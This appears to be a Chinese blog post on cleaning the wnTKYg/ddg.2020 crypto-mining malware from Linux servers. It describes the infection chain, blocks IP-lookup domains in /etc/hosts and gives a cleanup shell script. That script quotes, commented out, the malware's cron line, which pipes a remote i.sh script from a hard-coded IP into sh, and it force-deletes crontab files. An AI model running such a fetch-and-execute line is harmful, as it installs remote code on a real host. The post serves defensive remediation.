近期 wnTKYg Linux 恶意软件简介

最新推荐文章于 2020-09-20 23:21:19 发布
最新推荐文章于 2020-09-20 23:21:19 发布
阅读量484 收藏
点赞数
文章标签: 恶意软件 http服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iodoo/article/details/78628564
版权

源头 : /tmp/ddg.2020


1.下载配置数据库,用来攻击其他电脑;
2.从配置中获取http服务器,下载i.sh的脚本;
3.将脚本插入到系统的cron中,定时执行;
4.执行脚本,将挖矿程序下载到本地,开始挖矿;

根据以上流程,可以从各个点来切断传播;

1. 切断第一步,让其无法获取配置文件,程序会先获取自身所在电脑的公网IP,

当获取不到公网IP之后,就没有然后了。。。以下从几个域名中可获取公网IP:

ident.me
v4.ident.me
ipinfo.io
ipecho.net
ipv4.icanhazip.com
ifconfig.co

在linux上 加入到 /etc/hosts

127.0.0.1  v4.ident.me

127.0.0.1  ipinfo.io
127.0.0.1  ipecho.net
127.0.0.1  ipv4.icanhazip.com
127.0.0.1  ifconfig.co

2.切断第三步,让其无法自动执行

删除该路径下面的所有文件 /var/spool/cron 

3.切断第四步,删除所有恶意程序

删除 /tmp/ddg.2020 /tmp/wnTKYg




必须要立马修改密码, 清除脚本

#!/bin/sh
#ver 1.1
chmod -x /tmp/ddg.2020 /tmp/wnTKYg
killall ddg.2020 wnTKYg
echo "as" > /tmp/ddg.2020
echo "as" > /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill

rm -rf  /var/spool/cron/root

rm -rf  /var/spool/cron/crontabs/root

#echo "* * * * * wget -q -O- http://10.0.22.61:9443/i.sh | sh" >> /var/spool/cron/crontabs/root

killall ddg.2020 wnTKYg

rm -rf /tmp/ddg.2020
rm -rf /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill


=勿转载~~
i0dooo
关注
Linux 服务器感染kerberods 病毒
qq_40907977的博客
05-07 810
作者:他二哥 链接:https://www.cnblogs.com/kobexffx/p/11000337.html 症状及表现 1、CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用。 注:ls top ps等命令已经被病毒的动态链接库劫持,无法正常使用,大家需要下载busybox。 2、crontab 定时任务异常,存在...
Linux系统发现新恶意软件
06-26 441
安全研究人员发现了一种新的Linux恶意软件,它似乎是由中国黑客创建的,并被用作远程控制受感染系统的手段。 这个恶意软件命名为HiddenWasp,由用户模式rootkit,木马和初始部署脚本组成。该恶意软件与另一个最近发现的Linux恶意软件应...
挖矿进程wnTKYg解决方案
weixin_34403693的博客
11-12 146
  阿里云推送了一段短信:您的服务器出现了入侵事件:挖矿进程。赶紧top一下      CPU占用率99%,好气哦   pkill wnTKYg 先杀死再说   几秒后又出现了,肯定有自动执行脚本   crontab -l 果然有两个(此处没有截图),立马删掉 /var/spool/cron/ 下的所有文件,   还是出现了wnTKYg,重复几次以上的操作,发现。。。麻辣鸡,ddg.1...
wnTKYg长期占用CPU资源(linux
baidu_36720706的博客
03-19 270
第一步:堵住木马入侵的源头由于一开始使用redis并没有设置密码,导致wnTKYg被植入。修补该漏洞的方法(在redis.conf中设置):①.修改默认端口# Accept connections on the specified port, default is 6379 (IANA #815344). # If port 0 is specified Redis will not listen...
minerd和wnTKYg进程(病毒)--被攻击CPU占用率达到100%
sylalak123的博客
01-08 496
今天登录服务器感觉服务器特别的慢。结果查看发现有两个进程占用CPU100%了,一个是minerd一个是wnTKYg。如果大家遇到请小心。 查看服务器各个程序占用资源量 [root@iZ2zeayj54m6qs0689jm ~]# top PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND ...
阿里云CentOS7.2清除wnTKYg木马
木头若愚
11-07 1848
最近发现阿里云CPU占用很高,一直是100%,重启之后降下来了,但过一会又100%。 用top命令查了一下,发现是wnTKYG进程占用了99.9%,百度了一下wnTKYG说是一个挖矿木马,中毒原因应该是redis没有设密码或者是弱口令。 先关了redis防止再次中招 systemctl stop redis_6379 接下来 如果/root/.ssh/下有异常文件或记录:rm -
CentOS7清除wnTKYg木马
紫眸的博客
06-11 6670
今天偶然发现服务器cpu占用率一直是100%,top查看了发现是一个名为wnTKYg的进程。 网上查找说是一个挖矿木马,清理之后做个记录。 木马如下图: 尝试pkill -9 wnTKYg杀死进程,发现没过多久又出现了 感觉好恶心,中毒原因应该是redis没有设密码或者是弱口令,先关了redis防止再次中招 systemctl stop redis 接下来 如果/root/.
分析teamTNT团队Linux挖矿木马执行过程与防范
欢迎访问胡宝全的博客
09-20 1568
分析teamTNT团队Linux挖矿木马执行过程与防范 公司需要扩展海外业务,需要有一台海外云服务器。当我们把应用部署上去时的第二天所有应用down掉了,然后发现ssh连接服务器特别慢。好不容易连接上了执行一下free -h 发现内存占用99%,反手一个top,等了大约2分钟出来结果。 问题排查 查看当前内存:free -h 发现内存占用几乎达到98%。 查看当前进程:top等了大约2分钟出来结果。竟然有7000多个tasks,load average: 459.78, 584.52, 387.07,这明
记录linux zigw挖矿病毒查杀
guanzhengyinqin的博客
01-27 1382
关于此病毒的参考文献: https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757GtnJxj&cat=6270 病毒介绍 https://yq.aliyun.com/articles/657476 病毒清理,不过有时会复发 https://blog.csdn.net/sayWhat_sayHello/...
太恐怖了,我的Linux服务器感染了kerberods病毒...
Xn346的博客
04-17 785
一、症状及表现 1、CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用。 注:ls top ps等命令已经被病毒的动态链接库劫持,无法正常使用,大家需要下载busybox。 2、crontab 定时任务异常,存在以下内容; 3、后期病毒变异,劫持sshd,导致远程登陆失败,偶尔还会跳出定时任务失败,收到新邮件等问题 4、 存在异常...
服务器被挂马wnTKYg挖矿的清理
追梦的博客
05-15 314
locate wnTKYg命令一上屏,遂将这个程序位置暴露出来,竟然在/tmp下。百度查了查据说这个是redis允许远程连接并且没设密码的关系,正好符合我们新项目测试的环境,赶紧打开/etc/redis.conf文件 把bind 127.0.0.1的注释del掉了,重启redis。测试从外部机器上登录redis已经登不上了。接下来改着手干掉这个进程了,二话不说直接kill -9掉这个进程,cd到/...
wnTKYg木马的解决
qq877192055的博客
09-29 487
tomcat 无缘无故卡死,查询cpu发现cpu一直很高 top命令,发现异常进程wnTKYg 1.cd /tmp 删除所有ddg开头的文件和wnTKYg文件 2.kill掉ddg开头的进程和wnTKYg进程 3.、/var/spool/cron 下面删除文件 再监控10分钟,发现cpu正常了
服务器挖矿又出新服务 wnTKYg
热门推荐
my8611051316的专栏
03-06 1万+
wnTKYg同minerd和AnXqV两个一样都是挖矿程序。 一台服务器安装的redis3.2.8(6379端口)的版本,今天发现还是被挖矿,这次和之前的不同服务器的CPU资源没被耗到98%,而是一直维持在70%。同IP端内的另一台服务器redis3.2.8(6000端口)的机器目前没有被挖矿,继续监控中。 临时解决方法跟之前一样。 1、关闭访问挖矿服务器的访问:iptables -I
清除wnTKYg 这个挖矿工木马的过程讲述
u010789532的博客
04-23 9294
由于工作需要,我由一个专业java开发工程师,渐渐的也成为了不专业的资深的运维工程师了。感慨一番,书归正传,下面就讲解wnTKYg如何清除。最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU也一直保持75%,然后在xShell上top了一下,发现wnTKYg这个程序CPU占用率300%, 这个挖矿工木马的过程讲述" title="清除wnTKYg 这个挖矿工木马的过程讲述" style
Java调用Jenkins API获取任务构建归档文件
建伟博客
03-14 4354
Centos 清除wnTKYg 删除挖矿病毒 redis漏洞
基于java网上球鞋竞拍系统设计与实现.docx
09-19
基于java网上球鞋竞拍系统设计与实现.docx
基于bert实现关系三元组抽取python源码+数据集+项目说明.zip
最新发布
09-19
基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip 个人大四的毕业设计、课程设计、作业、经导师指导并认可通过的高分设计项目,评审平均分达96.5分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 [资源说明] 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设或者课设、作业,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96.5分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),供学习参考。
基于java的足球赛会管理系统设计与实现.docx
09-19
基于java的足球赛会管理系统设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值